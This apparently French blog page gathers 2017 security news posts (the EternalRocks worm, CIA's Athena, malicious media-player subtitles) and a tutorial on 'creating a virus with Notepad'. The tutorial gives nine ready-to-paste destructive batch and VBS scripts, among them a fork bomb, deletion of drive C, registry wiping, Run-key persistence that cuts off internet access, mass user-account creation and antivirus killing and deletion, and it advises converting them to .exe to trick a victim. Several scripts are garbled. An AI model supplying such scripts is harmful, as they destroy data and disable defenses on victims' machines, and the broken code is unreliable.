Powered By Blogger

Rechercher sur ce blogue

samedi 24 juin 2017

Un nouveau ver exploite sept failles découvertes par la NSA (contre deux seulement pour WannaCry)





23/05/17
Des chercheurs ont repéré un nouveau maliciel (malware) exploitant pas moins de sept failles de la NSA. Chaque brèche avait été décelée par la NSA, puis dévoilée par le groupe de hackers The Shadow Brokers. WannaCry n'exploitait pour sa part que deux de ces bugs.



Le nouveau ver a été découvert en premier lieu par Miroslav Stampar, un membre du CERT (computer emergency response team) croate. Les plus anciennes traces du virus remontent au 3 mai déjà, selon l'expert en cyber-sécurité sur Github. Stampar a découvert Eternalrocks (comme il s'appelle) au moyen d'un 'honeypot' (pot de miel ou piège à pirates) Windows 7. Un honeypot est un système informatique rendu sciemment vulnérable et surveillé, afin d'intercepter et d'analyser de nouvelles menaces.
EternalRocks utilise ETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE et ETERNALSYNERGY pour infecter de nouveaux ordinateurs. SMBTOUCH et ARCHITOUCH sont, elles, exploitées pour rechercher de nouvelles victimes, et DOUBLEPULSAR pour se propager vers d'autres machines. Ces sept failles avaient été décelées par la NSA américaine. WannaCry, le rançongiciel qui a fait dernièrement plus de 240.000 victimes, n'exploitait pour sa part qu'ETERNALBLUE et DOUBLEPULSAR.
Contrairement à WannaCry, ce maliciel passe provisoirement inaperçu aux yeux des utilisateurs. Dans un premier temps, EternalRocks télécharge le navigateur Tor pour établir une connexion privée avec les serveurs cachés du ver. Ce n'est que le lendemain que l'infection commence à se propager. Cela a probablement pour but de mettre les experts en cyber-sécurité sur une mauvaise piste, étant donné que rares sont ceux qui attendent un jour complet une réponse du serveur caché. Dans une autre tentative de mystifier les experts, le maliciel s'appelle lui-même aussi WannaCry.
Provisoirement, le ver se propage en grand secret, sans entreprendre d'action. On ne sait de la sorte pas combien d'ordinateurs sont déjà infectés. Stampar met toutefois en garde contre le fait qu'EternalRocks peut être activé à tout moment, afin d'acheminer des maliciels sur tout système contaminé. Plus vite l'utilisateur met à jour son ordinateur au moyen des plus récents correctifs, mieux c'est donc.

REF.:

Athena, le malware qui permet à la CIA d'espionner tous les Windows

Révélée par WikiLeaks, cette plate-forme de malwares est capable de cibler tous les PC, de Windows XP à Windows 10. Elle a été développée par une société privée pour le compte de la CIA.

jeudi 22 juin 2017

Comment créer un virus avec Notepad



Comment créer un virus dangereux avec Notepad ,pour contre-attaquer un Hacker !


 Les virus sont des logiciels malveillants qui peuvent causer beaucoup de dommages à P.C., ordinateur et ordinateur portable. Habituellement, ils se répandent grâce au partage de fichiers spécialement sur Internet. Le partage de fichiers Torrents et les pièces jointes aux courriers électroniques sont des moyens courants de propagation d'un virus.
 
Avant d'entrer dans les détails, permettez-moi d'expliquer quel est un fichier batch? Il s'agit simplement d'un fichier texte contenant des séries de commandes exécutées automatiquement, ligne par ligne, lorsque le fichier batch s'exécute. J'ai utilisé plusieurs virgules pour diviser la phrase en plusieurs parties pour faciliter la compréhension.
 
Ainsi, en utilisant Batch File, vous pouvez créer des virus extrêmement dangereux pour supprimer les fichiers Windows, formater différents lecteurs (C:, D:, E :), voler des informations, désactiver les pare-feu.
 
Maintenant, voici quelques virus de fichiers par lots, mais extrêmement dangereux. Vous devez simplement appuyer sur Ctrl + C (Copier) et Ctrl + V (Coller) dans le Bloc-notes. Ensuite, enregistrez le fichier du bloc-notes comme "anyname.bat". Assurez-vous d'utiliser '.bat' comme extension, sinon cela ne fonctionnera pas.


1. Application Bomber:-
@echo off
😡
start winword
start mspaint
start notepad
start write
start cmd
start explorer
start control
start calc
goto x
Fonction: une fois exécuté, il va commencer à ouvrir plusieurs applications à plusieurs reprises, ce qui affectera les performances du système. Vous pouvez également ajouter une application de votre choix dans le code ci-dessus.

2. Folder Flooder-

@echo off
😡
md %random%
/folder.
goto x
Fonction: une fois exécuté, il va commencer à générer des dossiers dont le nom peut être n'importe quel nombre aléatoire.

3. User Account Flooder:-

@echo off
:xnet
user %random% /add
goto x
Fonction: une fois exécuté, il va commencer à créer des comptes utilisateur Windows dont le nom peut être un nombre aléatoire.

4. Process Creator:-

%0|%0
Fonction: - Une fois exécuté, il commencera à générer un grand nombre de processus très rapidement entraînant une suspension de P.C.

5. Internet Disabler:-

echo @echo off>c:windowswimn32.bat
echo break off>c:windowswimn32.bat echo
ipconfig/release_all>c:windowswimn32.bat
echo end>c:windowswimn32.batreg add
hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add
hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /fecho You Have Been HACKED!
PAUSE
Fonction: une fois exécuté, il désactive la connexion Internet d'un ordinateur en permanence.

6. O.S. Hacker:-

@Echo off
Del C: *.* |y
Fonction: - Une fois qu'il sera exécuté, il formatera le lecteur de disque C et entraînera donc la suppression de l'O.S. Vous pouvez également remplacer C par n'importe quel lecteur de votre choix.

7. Registry Deleter:-

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been hacked by cool hacker. Have a nice day. Enjoy!!!
GOTO MESSAGE
Fonction: - Une fois exécuté, il supprime les fichiers de registre et laisse un message. Cela peut très affecter l'ordinateur de la victime.

8. Crazy Caps Lock:-

Set wshShell
=wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
Fonction: - Une fois qu'il est exécuté, il sera activé et désactivé par Caps Lock en cas d'ennui de l'utilisateur.

9. Anti Virus Disabler:-

@ echo off
rem
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmincls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:Program Filesalwils~1avast4*.*
del /Q /F C:Program FilesLavasoftAd-awa~1*.exe
del /Q /F C:Program Fileskasper~1*.exe
cls
del /Q /F C:Program Filestrojan~1*.exe
del /Q /F C:Program Filesf-prot95*.dll
del /Q /F C:Program Filestbav*.datcls
del /Q /F C:Program Filesavpersonal*.vdf
del /Q /F C:Program FilesNorton~1*.cnt
del /Q /F C:Program FilesMcafee*.*
cls
del /Q /F C:Program FilesNorton~1Norton~1Norton~3*.*
del /Q /F C:Program FilesNorton~1Norton~1speedd~1*.*
del /Q /F C:Program FilesNorton~1Norton~1*.*
del /Q /F C:Program FilesNorton~1*.*
cls
del /Q /F C:Program Filesavgamsr*.exe
del /Q /F C:Program Filesavgamsvr*.exe
del /Q /F C:Program Filesavgemc*.exe
cls
del /Q /F C:Program Filesavgcc*.exe
del /Q /F C:Program Filesavgupsvc*.exe
del /Q /F C:Program Filesgrisoft
del /Q /F C:Program Filesnood32krn*.exe
del /Q /F C:Program Filesnood32*.exe
cls
del /Q /F C:Program Filesnod32
del /Q /F C:Program Filesnood32
del /Q /F C:Program Fileskav*.exe
del /Q /F C:Program Fileskavmm*.exe
del /Q /F C:Program Fileskaspersky*.*
cls
del /Q /F C:Program Filesewidoctrl*.exe
del /Q /F C:Program Filesguard*.exe
del /Q /F C:Program Filesewido*.exe
cls
del /Q /F C:Program Filespavprsrv*.exe
del /Q /F C:Program Filespavprot*.exe
del /Q /F C:Program Filesavengine*.exe
cls
del /Q /F C:Program Filesapvxdwin*.exe
del /Q /F C:Program Fileswebproxy*.exe
del /Q /F C:Program Filespanda
software*.*
rem

Fonction: - Une fois exécuté, il désactivera Anti Virus du système de la victime.

L'inconvénient d'un fichier batch est que n'importe qui peut l'ouvrir avec un bloc-notes et lire la commande facilement. En outre, tout le monde peut le supprimer s'il le juge nuisible. Ainsi, pour surmonter la limitation / inconvénient, vous pouvez utiliser un outil cool nommé 'Batch to Exe Converter'. Il convertira l'extension '.bat' en extension '.exe'. Et votre fichier Batch sera converti en un fichier d'application. Vous pouvez facilement convaincre votre victime d'ouvrir le fichier.
Un message personnel à vous
C'est agréable de voir que vous avez passé par «Post Facebook Status in Future» complètement. J'espère que vous avez apprécié cet article. Cependant, si vous voulez que je livre des tutoriels et des articles de piratage plus intéressants, merci de partager mes postures. Vous pouvez utiliser le Widget de partage social fourni à la fin de chaque publication. Après tout, le partage est pris en charge !!!
Je vous remercie. Avoir une belle journée à l'avance!!!


REF.:

Samsung gravera les composants de nos smartphones en 4nm d’ici trois ans

La société coréenne vient de dévoiler une roadmap très volontariste pour les trois à quatre années à venir. L’objectif est d’introduire une nouvelle technologie pour remplacer le FinFET et d’atteindre progressivement le plancher incroyable des 4 nm.

Piratage par les sous-titres de vos lecteurs VLC, Kodi, Popcorn Time et Stremio



Faites attention! Ils peuvent vous pirater à travers des sous-titres pendant que vous regardez des films
Les sous-titres malvaillants peuvent permettre aux pirates informatiques de compromettre votre ordinateur et peut-être votre téléviseur tout en regardant des films.
Les chercheurs de sécurité de Check Point ont annoncé un nouveau vecteur d'attaque qui affecte et menace des millions d'utilisateurs à travers le monde. En créant des fichiers de sous-titres malveillants, qui sont ensuite téléchargés par le lecteur multimédia d'une victime, les pirates peuvent compromettre les appareils utilisateurs via des vulnérabilités trouvées dans les lecteurs multimédias populaires tels que VLC, Kodi, Popcorn-Time et Stremio. Environ 200 millions de lecteurs vidéo et de streamers qui exécutent actuellement les programmes vulnérables, ce qui rend cette attaque la plus répandue. Les chercheurs de sécurité de Check Point croient que des défauts de sécurité similaires existent également dans les autres lecteurs multimédias.
La vidéo suivante montre comment les victimes peuvent être piratées par des sous-titres méchants (suspects) en utilisant l'un des lecteurs multimédias affectés, où le code malveillant caché s'exécute une fois que le film est joué. Sur le côté droit de l'écran se trouve l'ordinateur de l'attaquant, qui exécute le système d'exploitation pirate, Kali Linux qui attend que l'ordinateur de la victime se connecte à son ordinateur.
Les chercheurs de Check Point ont déjà signalé les vulnérabilités aux développeurs des applications VLC, Kodi, Popcorn Time et Stremio. Les utilisateurs sont invités à mettre à jour leur logiciel de lecteur multimédia dès que possible.


REF.: